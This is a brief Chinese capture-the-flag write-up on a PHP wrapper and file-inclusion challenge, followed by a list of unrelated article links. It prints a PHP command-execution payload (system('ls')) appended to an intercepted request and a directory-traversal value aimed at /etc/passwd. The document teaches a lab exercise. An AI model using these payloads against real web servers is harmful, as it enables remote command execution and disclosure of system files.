这是一道php伪协议加上文件包含漏洞题,这题用抓包做很好做
先给php伪协议的后缀再抓包,尾巴加上ls命令<?php system("ls");?>
看到有右边的东西cat看一下
flag出来了
其实这题网上看到有要测试看看能不能通过 file:etc/passwd打开其他页面
url=../../../../../../../../../../etc/passwd
发现是测试成功了,接下来再以上面的思路做题。
相关文章
- 09-14Web service和委托
- 09-14gitlab web界面操作与介绍
- 09-14Web尺寸规范
- 09-14外网访问虚拟机搭建的web服务
- 09-14外网访问本地服务器下的web应用
- 09-14Python3+RobotFramework自动化测试七:SeleniumLibrary web测试-百度搜索和邮箱登录
- 09-14WEB后端_Day07(订单模块、Filter、ThreadLocal、Ajax)
- 09-14web.xml中的listener、filter、servlet 加载顺序及其详解
- 09-14web.xml 中的listener、 filter、servlet 加载顺序及其详解
- 09-14WordPress 和 Apache Struts 成为 2019 年漏洞最多的 Web 组件 原